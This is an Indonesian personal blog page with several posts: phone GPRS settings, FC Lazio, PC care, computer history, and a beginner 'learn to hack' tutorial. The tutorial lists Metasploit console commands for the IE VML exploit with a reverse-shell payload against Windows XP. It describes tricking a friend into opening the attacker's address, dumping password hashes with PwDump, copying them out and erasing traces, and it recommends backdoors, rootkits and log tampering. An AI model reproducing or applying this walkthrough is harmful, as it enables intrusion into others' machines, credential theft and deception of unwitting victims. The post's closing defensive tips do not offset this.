welcome to the blog "THOTHOEGHT, blog to share knowledgeblog created to promote and disseminate the best science in the field of education, research, general knowledge and specific
want to translate please choose Language
English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified
Tampilkan postingan dengan label pengetahuan. Tampilkan semua postingan
Tampilkan postingan dengan label pengetahuan. Tampilkan semua postingan

Kamis, 25 November 2010


Setting GPRS AXIS, IM3, XL, Telkomsel, Mentari Nokia 5300

by thoeght

Untuk men-setting GPRS di Handphone ini dapat dibilang mudah. Asal tahu caranya. Berikut langkah-langkah untuk mensetting GPRS di Handphone Nokia 5300 Anda :
Buka Menu
Pilih Settings (Pengaturan)
Pilih Configuration (Konfigurasi)
Pilih Personal Config. Sett. (P’aturan konfig. prib.)
Klik Option (Pilihan) > Add New (Tambah Baru) > Access Point (Jalur Akses)
Masukkan Data berikut menurut Provider (Kartu GSM)

Untuk Telkomsel (Simpati/Halo) harus daftar terlebih dahulu. Klik disini untuk daftar

Untuk Indosat (Im3/Mentari) untuk mendapatkan akses GPRS per menit, ubah Username menjadi “indosat@durasi” dan Password menjadi “indosat@durasi”

Setelah itu, Kembali lagi ke menu personal account (Personal Config. Sett.)
Pilih Access Point yang akan digunakan > Option > Active
Lalu Kembali ke menu Configuration Settings (Configuration)
Klik Default Config. Sett.
Pilih Personal Config.
Lalu Klik Option > Set as Default
Klik Activ. Def. in All Apps.
Klo masih gak bisa ya tinggal ke counter trus minta tolong ma petugasnya
He…he….
Slamat mencoba

NB: jangan komplain jika nanti hp-nya rusak……

Selengkapnya...

Rabu, 02 Juni 2010

TIP DAN TRIK


BELAJAR MENJADI HACKER
by thoeght

Dalam suatu kesempatan saat magang, saya pernah melihat seorang IT keamanan jaringan melakukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya ngerti dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus.
Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework
Peristiwa tersebut menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya otak-atik dan bermain angka serta lambang. Tulisan ini memberikan gambaran mengenai bagaimana salah satu cara yang umum dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang.
Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.
Artikel ini ditujukan bagi pemula, dan disusun oleh seorang pemula yang disebarluaskan di blog pemula (he...he.....). Ditulis untuk pengetahuan semata dan menambah wawasan mengenai hacker. Untuk temen2 yg udah ahli, gak usah digapai, tapi dibaca juga gpp…. Kalau perlu kasih komentar dan saran
hacking adalah mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, melalui lambang angka dan huruf yang semua orang tidak mengerti (aku juga sampai saat ini gak ngerti kenapa kok ada bahasa seperti itu). Sesuatunya apa? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi saya kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, tanya aja ke mbah google (ketik How to Become A Hacker). Dengan demikian bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol punya orang (program maksudnya)? belum tentu kan….

Pada artikel ini, saya ingin membagi pengalaman mengenai Hacking, walaupun sampai saat ini saya belum pernah nge-Hack ke server orang (belum berhasil maksudnya he...he....). tapi klo curi akun password di facebook milik teman bisa kok kwkwkwkw, hati-hati yang kenal ma aku di facebook.
Salah satu cara untuk mencoba simulasi Hack yaitu dengan membuat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack betulan… apalagi klo di rumah teman-teman ada jaringan.
Sulit khan?????????
Baiklah, sekarang waktunya melakukan aksi… are you ready let’s go do it
1. Fase Persiapan
- Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password (lebih mudah pinjam CD teman yang sudah biasa hack)
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya yaitu cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraktekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot.
Saran saya, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare
Baiklah skarang kita mulai berpratik (klo berhasil syukur klo gak yang dicoba terus sampai berhasil, OK!!!!!!!)
Disini saya sengaja mengulas pembahasan ini menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research. (maklum gak bias bahasa inggris jadi takut salah arti jika diterjemahkan)

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit diotak-atikk, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan dalam bentuk gambar

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack sekalian Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip hampir sama tentang Hack Win XP SP2 Password (dah tahu khan), tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan ada gambar klo dialam kode dos seperti ini dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking….. (tapi yang perlu diingat bahwa saya bukan mengajari anda untuk menoprak komputer orang lho.... ini sekedar pengetahuan aja)
Untuk itu biar saya gak dicap sebagai hacker maka saya akan memberikan tip agar anda aman dari hacking/exploit diatas

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! He…he….. (pengalaman pribadi nih)
Selengkapnya...

Senin, 18 Januari 2010

OLAHRAGA (Sepakbola)

About FC LAZIO
by thoeght

Kali ini saya akan memberikan informasi mengenai olahraga khususnya dalam Sepakbola. Sepakbola merupakan suatu olahraga yang paling banyak digemari oleh seluruh manusia di dunia. Saya mengulas mengenai salah satu klub yang berlaga di seri A Italia.
FC LAZIO adalah club favorit saya sejak kecil, dalam kesempatan ini saya akan mencoba untuk menggali informasi mengenai FC Lazio. Jadi bagi teman-teman yang mengidolakan klub lain saya mohon maaf.
Berdiri : 1900
Alamat : Via di S. Cornelia, 1000 - 00060 Formello Italy
Telepon : +39 06-97607111
Ketua : Claudio Lotito
Stadion : Stadio Olimpico
Sejarah
Lazio berdiri di awal tahun 1900 di Prati, salah satu distrik kota Roma. Adapun pertama berdiri, Lazio bukan hanya berbentuk sebuah klub sepakbola, melainkan juga mengayomi cabang olahraga lain.
Lazio ambil bagian dalam kompetisi di tahun 1912. Lazio juga menjadi satu-satunya klub besar ibukota Italia yang tidak bersedia bergabung dalam merger yang digagas Benito Mussolini yang akhirnya membentuk klub baru berjuluk AS Roma.
Ikon warna Lazio terkenal dengan warna putih biru langit. Warna ini terinspirasi dari lambang nasional Yunani.
Kostum lazio untuk pertama kalinya terdiri dari tiga warna, yaitu putih, biru langit dan hitam. namun seiring berjalannya waktu warna hitam dihilangkan dan bertahan hingga saat ini.
Logo Lazio berwujud elang, yang merupakan pilihan Luigi Bigiarelli, pendiri Lazio. Diketahui lambang tersebut diambil dari logos pasukan kerajaan Roma yang disebut Aquila.
Tahun pertama masuk Serie A: 1929

Jumlah musim di Serie A: 67 musim

Nama Stadion: Stadion Olimpico, Roma Italia (Kapasitas: 72,700)

Formasi Tim (2009/2010):
4-4-2: Fernando Muslera, Aleksander Kolarov, Sebastiano Siviglia, Lorenzo Di Silvestri, Lionel Scaloni, Stefano Mauri, Cristian Ledesma, Paquale Fogglia, Tommaso Rocchi, Julio Cruz, Mauro Zarate

Prestasi
Serie A : 2
Champions (2) : 1973–74 ; 1999–00
Runners-up (3) : 1936–37 ; 1994–95 ; 1998–99
Coppa Italia : 5
Winners (5) : 1958; 1997–98 ; 1999–00 ; 2003–04 ; 2008–09
Runners-up (1) : 1960–61
• Italian Super Cup : 3
Winners (3) : 1998 ; 2000 ; 2009
Runners-up (1) : 2004
• Serie B : 1
Champions (1) : 1968-69
Runners-up (3) : 1962-63 ; 1971-72 ; 1982-83
Promoted (2) : 1926-27 ; 1987-88
European titles
• UEFA Cup Winners' Cup :
Winners : 1998–99
• UEFA Super Cup :
Winners : 1999
• UEFA Cup :
Runners-up : 1997–98

Selengkapnya...

Selasa, 12 Januari 2010

TIP DAN TRIK

Merawat Komputer
by thoeght

Dalam artikel ini akan membahas tips dan cara merawat komputer. Hal ini dilakukan supaya komputer kita lebih tahan lama dan nggak gampang rusak. Sama halnya dengan tubuh manusia yang membutuhkan perawatan. PC kamu juga membutuhkannya.
Kalau untuk manusia perawatan itu ada dua sisi yaitu rohani dan jasmani. Begitu juga dalam hal merawat komputer.. ada dua hal juga yang harus diperhatikan yaitu sisi software dan hardware. Perawatan komputer sangatlah mudah, dan itu harus dilakukan bagi kita.
Cara merawat komputer dari sisi software :
• Selalu lengkapi komputer dengan software antivirus gratis terbaik. Tapi mencegah lebih baik dari mengobati, maka dari pada itu untuk mencegah virus baca artikel komputer sub bab virus yang ada dalam blog ini
• Defrag selalu harddiskmu. Supaya proses read maupun write jadi lebih ringan karena filenya berurutan.
• Setelah defrag juga akan lebih baik menggunakan Disk Cleanup. Dengam fasilitas default dari windows ini akan menghapus file nggak penting seperi file temporary, file cache Internet.
• Aktifkan scrensaver jika monitormu masih CRT
• Tolong! Uninstal software-software yang tidak pernah digunakan. Hal ini bertujuan agar dalam proses menjalankan windows tidak terlalu berat
• Supaya nggak ada security hole, Ingat selalu untuk update software anda.
• Jika sering instal-unistal, Selalu Bersihkan system registry kamu. Banyak kok software untuk membersihkannya, coba cari di softwaregratis.us.

Selanjutnya adalah artikel merawat komputer dari sisi hardware :
• Buka casing PC kemudian Bersihkan debu yang ada di motherboard peripheral lainnya. Pembersihan bisa menggunakan sikat halus (kuas cat). Lakukan ini selama empat bulan sekali.
• Untuk mengantisipasi mati listrik secara tiba-tiba, pakailah STAVOLT atau UPS
• Gunakan pendingin ruangan. Kalau nggak punya duit bisa memakai Sirip Pendingin dan dan Coolling Fan Ekstra
• Hindarkan komputermu dengan alat yang dapat memancarkan medan magnet jadi jangan dekatkan komputer kamu dengan HP, ataupun speaker aktif yang penting jangan dekat dengan benda yang ada magnetnya
• Matikan komputermu jika nggak dipakai, jangan dibiarkan pada posisi stanby bila tidak dalam keadaan memaksa
• jangan sampai komputermu nggak kepakai dalam waktu lama. Usahakan 2 hari komputer dinyalakan walaupun hanya sebentar untuk menjaga agar komponen tidak cepat rusak.
• Jika dipakai kerja lembur, usahakan jangan melebihi dari 24 jam tidak dimatikan, gunakan fasilitas restart
Namun yang lebih penting jangan lupa, setelah membaca artikel komputer ini langsung dipraktekkan. Kalau nggak.. jangan menyesal kalau komputernya rusak. Penyesalan itu selalu datang terlambat. :((


Selengkapnya...

Senin, 11 Januari 2010

Artikel PENGETAHUAN

Sejarah Komputer
by thoegh

Dalam artikel kali ini, saya akan dibahas mengenai perkembangan komputer. Dewasa ini banyak orang tidak mengetahui sejarah perkembangan computer, walaupun sering kali atau bahkan disetiap waktu senggang mereka menggunakannya.
Apabila ditanya sampai saat ini sudah generasi yang keberapa dan apa yang membedakan generasi yang dulu dengan generasi yang sekarang? Kebanyakan mereka hanya mengenal computer dari segi spesifikasi software ataupun hardwarenya saja bahkan banyak juga yang hanya mengenal computer itu digunakan untuk mengetik dan bermain internet.
Tulisan ini saya buat untuk menambah wawasan dan pengetahuan mengenai computer, di postingan yang lain akan dimuat hal-hal yang harus diperhatikan saat kita mempunyai computer ataupun cara perawatan, perbaikan dan memilih suatu computer yang sesuai dengan kebutuhan kita.
Pengertian Komputer
Komputer adalah alat yang dipakai untuk mengolah data menurut prosedur yang telah dirumuskan. Kata computer semula dipergunakan untuk menggambarkan orang yang perkerjaannya melakukan perhitungan aritmatika, dengan atau tanpa alat bantu, tetapi arti kata ini kemudian dipindahkan kepada mesin itu sendiri. Asal mulanya, pengolahan informasi hampir eksklusif berhubungan dengan masalah aritmatika, tetapi komputer modern dipakai untuk banyak tugas yang tidak berhubungan dengan matematika.
Dalam definisi seperti itu terdapat alat seperti slide rule, jenis kalkulator mekanik mulai dari abakus dan seterusnya, sampai semua komputer elektronik yang kontemporer. Istilah lebih baik yang cocok untuk arti luas seperti "komputer" adalah "yang memproses informasi" atau "sistem pengolah informasi."
Saat ini, komputer sudah semakin canggih. Tetapi, sebelumnya komputer tidak sekecil, secanggih, sekeren dan seringan sekarang. Dalam sejarah komputer, ada 5 generasi dalam sejarah komputer.

Generasi Komputer
[] Generasi Pertama
Dengan terjadinya Perang Dunia Kedua, negara-negara yang terlibat dalam perang tersebut berusaha mengembangkan komputer untuk mengeksploit potensi strategis yang dimiliki komputer. Hal ini meningkatkan pendanaan pengembangan komputer serta mempercepat kemajuan teknik komputer. Pada tahun 1941, Konrad Zuse, seorang insinyur Jerman membangun sebuah komputer, Z3, untuk mendesain pesawat terbang dan peluru kendali.
Pihak sekutu juga membuat kemajuan lain dalam pengembangan kekuatan komputer. Tahun 1943, pihak Inggris menyelesaikan komputer pemecah kode rahasia yang dinamakan Colossus untuk memecahkan kode rahasia yang digunakan Jerman. Dampak pembuatan Colossus tidak terlalu mempengaruhi perkembangan industri komputer dikarenakan dua alasan. Pertama, Colossus bukan merupakan komputer serbaguna (general-purpose computer), ia hanya didesain untuk memecahkan kode rahasia. Kedua, keberadaan mesin ini dijaga kerahasiaannya hingga satu dekade setelah perang berakhir.
Usaha yang dilakukan oleh pihak Amerika pada saat itu menghasilkan suatu kemajuan lain. Howard H. Aiken (1900-1973), seorang insinyur Harvard yang bekerja dengan IBM, berhasil memproduksi kalkulator elektronik untuk US Navy. Kalkulator tersebut berukuran panjang setengah lapangan bola kaki dan memiliki rentang kabel sepanjang 500 mil. The Harvard-IBM Automatic Sequence Controlled Calculator, atau Mark I, merupakan komputer relai elektronik. Ia menggunakan sinyal elektromagnetik untuk menggerakkan komponen mekanik. Mesin tersebut beropreasi dengan lambat (ia membutuhkan 3-5 detik untuk setiap perhitungan) dan tidak fleksibel (urutan kalkulasi tidak dapat diubah). Kalkulator tersebut dapat melakukan perhitungan aritmatik dasar dan persamaan yang lebih kompleks.
Perkembangan komputer lain pada masa kini adalah Electronic Numerical Integrator and Computer (ENIAC), yang dibuat oleh kerjasama antara pemerintah Amerika Serikat dan University of Pennsylvania. Terdiri dari 18.000 tabung vakum, 70.000 resistor, dan 5 juta titik solder, komputer tersebut merupakan mesin yang sangat besar yang mengkonsumsi daya sebesar 160kW.
Komputer ini dirancang oleh John Presper Eckert (1919-1995) dan John W. Mauchly (1907-1980), ENIAC merupakan komputer serbaguna (general purpose computer) yang bekerja 1000 kali lebih cepat dibandingkan Mark I.
Pada pertengahan 1940-an, John von Neumann (1903-1957) bergabung dengan tim University of Pennsylvania dalam usaha membangun konsep desain komputer yang hingga 40 tahun mendatang masih dipakai dalam teknik komputer. Von Neumann mendesain Electronic Discrete Variable Automatic Computer (EDVAC) pada tahun 1945 dengan sebuah memori untuk menampung baik program ataupun data. Teknik ini memungkinkan komputer untuk berhenti pada suatu saat dan kemudian melanjutkan pekerjaannya kembali. Kunci utama arsitektur von Neumann adalah unit pemrosesan sentral (CPU), yang memungkinkan seluruh fungsi komputer untuk dikoordinasikan melalui satu sumber tunggal. Tahun 1951, UNIVAC I (Universal Automatic Computer I) yang dibuat oleh Remington Rand, menjadi komputer komersial pertama yang memanfaatkan model arsitektur Von Neumann tersebut.
Baik Badan Sensus Amerika Serikat dan General Electric memiliki UNIVAC. Salah satu hasil mengesankan yang dicapai oleh UNIVAC dalah keberhasilannya dalam memprediksi kemenangan Dwilight D. Eisenhower dalam pemilihan presiden tahun 1952.
Komputer Generasi pertama dikarakteristik dengan fakta bahwa instruksi operasi dibuat secara spesifik untuk suatu tugas tertentu. Setiap komputer memiliki program kode biner yang berbeda yang disebut “bahasa mesin” (machine language). Hal ini menyebabkan komputer sulit untuk diprogram dan membatasi kecepatannya. Ciri lain komputer generasi pertama adalah penggunaan tube vakum (yang membuat komputer pada masa tersebut berukuran sangat besar) dan silinder magnetik untuk penyimpanan data.

[] Generasi Kedua
Pada tahun 1948, penemuan transistor sangat mempengaruhi perkembangan komputer. Transistor menggantikan tube vakum di televisi, radio, dan komputer. Akibatnya, ukuran mesin-mesin elektrik berkurang drastis.
Transistor mulai digunakan di dalam komputer mulai pada tahun 1956. Penemuan lain yang berupa pengembangan memori inti-magnetik membantu pengembangan komputer generasi kedua yang lebih kecil, lebih cepat, lebih dapat diandalkan, dan lebih hemat energi dibanding para pendahulunya. Mesin pertama yang memanfaatkan teknologi baru ini adalah superkomputer. IBM membuat superkomputer bernama Stretch, dan Sprery-Rand membuat komputer bernama LARC. Komputer-komputer ini, yang dikembangkan untuk laboratorium energi atom, dapat menangani sejumlah besar data, sebuah kemampuan yang sangat dibutuhkan oleh peneliti atom. Mesin tersebut sangat mahal dan cenderung terlalu kompleks untuk kebutuhan komputasi bisnis, sehingga membatasi kepopulerannya. Hanya ada dua LARC yang pernah dipasang dan digunakan: satu di Lawrence Radiation Labs di Livermore, California, dan yang lainnya di US Navy Research and Development Center di [[Washington D.C. Komputer generasi kedua menggantikan bahasa mesin dengan bahasa assembly. Bahasa assembly adalah bahasa yang menggunakan singkatan-singakatan untuk menggantikan kode biner.
Pada awal 1960-an, mulai bermunculan komputer generasi kedua yang sukses di bidang bisnis, di universitas, dan di pemerintahan. Komputer-komputer generasi kedua ini merupakan komputer yang sepenuhnya menggunakan transistor. Mereka juga memiliki komponen-komponen yang dapat diasosiasikan dengan komputer pada saat ini: printer, penyimpanan dalam disket, memory, sistem operasi, dan program.
Salah satu contoh penting komputer pada masa ini adalah IBM 1401 yang diterima secara luas di kalangan industri. Pada tahun 1965, hampir seluruh bisnis-bisnis besar menggunakan komputer generasi kedua untuk memproses informasi keuangan.
Program yang tersimpan di dalam komputer dan bahasa pemrograman yang ada di dalamnya memberikan fleksibilitas kepada komputer. Fleksibilitas ini meningkatkan kinerja dengan harga yang pantas bagi penggunaan bisnis. Dengan konsep ini, komputer dapat mencetak faktur pembelian konsumen dan kemudian menjalankan desain produk atau menghitung daftar gaji. Beberapa bahasa pemrograman mulai bermunculan pada saat itu. Bahasa pemrograman Common Business-Oriented Language (COBOL) dan Formula Translator (FORTRAN) mulai umum digunakan. Bahasa pemrograman ini menggantikan kode mesin yang rumit dengan kata-kata, kalimat, dan formula matematika yang lebih mudah dipahami oleh manusia. Hal ini memudahkan seseorang untuk memprogram dan mengatur komputer. Berbagai macam karir baru bermunculan (programmer, analis sistem, dan ahli sistem komputer). Industri piranti lunak juga mulai bermunculan dan berkembang pada masa komputer generasi kedua ini.

[] Generasi Ketiga
Walaupun transistor dalam banyak hal mengungguli tube vakum, namun transistor menghasilkan panas yang cukup besar, yang dapat berpotensi merusak bagian-bagian internal komputer. Batu kuarsa (quartz rock) menghilangkan masalah ini. Jack Kilby, seorang insinyur di Texas Instrument, mengembangkan sirkuit terintegrasi (IC : integrated circuit) di tahun 1958. IC mengkombinasikan tiga komponen elektronik dalam sebuah piringan silikon kecil yang terbuat dari pasir kuarsa. Pada ilmuwan kemudian berhasil memasukkan lebih banyak komponen-komponen ke dalam suatu chip tunggal yang disebut semikonduktor. Hasilnya, komputer menjadi semakin kecil karena komponen-komponen dapat dipadatkan dalam chip. Kemajuan komputer generasi ketiga lainnya adalah penggunaan sistem operasi (operating system) yang memungkinkan mesin untuk menjalankan berbagai program yang berbeda secara serentak dengan sebuah program utama yang memonitor dan mengkoordinasi memori komputer.

[] Generasi Keempat
Setelah IC, tujuan pengembangan menjadi lebih jelas: mengecilkan ukuran sirkuit dan komponen-komponen elektrik. Large Scale Integration (LSI) dapat memuat ratusan komponen dalam sebuah chip. Pada tahun 1980-an, Very Large Scale Integration (VLSI) memuat ribuan komponen dalam sebuah chip tunggal.
Ultra-Large Scale Integration (ULSI) meningkatkan jumlah tersebut menjadi jutaan. Kemampuan untuk memasang sedemikian banyak komponen dalam suatu keping yang berukurang setengah keping uang logam mendorong turunnya harga dan ukuran komputer. Hal tersebut juga meningkatkan daya kerja, efisiensi dan keterandalan komputer. Chip Intel 4004 yang dibuat pada tahun 1971 membawa kemajuan pada IC dengan meletakkan seluruh komponen dari sebuah komputer (central processing unit, memori, dan kendali input/output) dalam sebuah chip yang sangat kecil. Sebelumnya, IC dibuat untuk mengerjakan suatu tugas tertentu yang spesifik. Sekarang, sebuah mikroprosesor dapat diproduksi dan kemudian diprogram untuk memenuhi seluruh kebutuhan yang diinginkan. Tidak lama kemudian, setiap piranti rumah tangga seperti microwave, oven, televisi, dan mobil dengan electronic fuel injection (EFI) dilengkapi dengan mikroprosesor.
Perkembangan yang demikian memungkinkan orang-orang biasa untuk menggunakan komputer biasa. Komputer tidak lagi menjadi dominasi perusahaan-perusahaan besar atau lembaga pemerintah. Pada pertengahan tahun 1970-an, perakit komputer menawarkan produk komputer mereka ke masyarakat umum. Komputer-komputer ini, yang disebut minikomputer, dijual dengan paket piranti lunak yang mudah digunakan oleh kalangan awam. Piranti lunak yang paling populer pada saat itu adalah program word processing dan spreadsheet. Pada awal 1980-an, video game seperti Atari 2600 menarik perhatian konsumen pada komputer rumahan yang lebih canggih dan dapat diprogram.
Pada tahun 1981, IBM memperkenalkan penggunaan Personal Computer (PC) untuk penggunaan di rumah, kantor, dan sekolah. Jumlah PC yang digunakan melonjak dari 2 juta unit di tahun 1981 menjadi 5,5 juta unit di tahun 1982. Sepuluh tahun kemudian, 65 juta PC digunakan. Komputer melanjutkan evolusinya menuju ukuran yang lebih kecil, dari komputer yang berada di atas meja (desktop computer) menjadi komputer yang dapat dimasukkan ke dalam tas (laptop), atau bahkan komputer yang dapat digenggam (palmtop).
IBM PC bersaing dengan Apple Macintosh dalam memperebutkan pasar komputer. Apple Macintosh menjadi terkenal karena mempopulerkan sistem grafis pada komputernya, sementara saingannya masih menggunakan komputer yang berbasis teks. Macintosh juga mempopulerkan penggunaan piranti mouse.
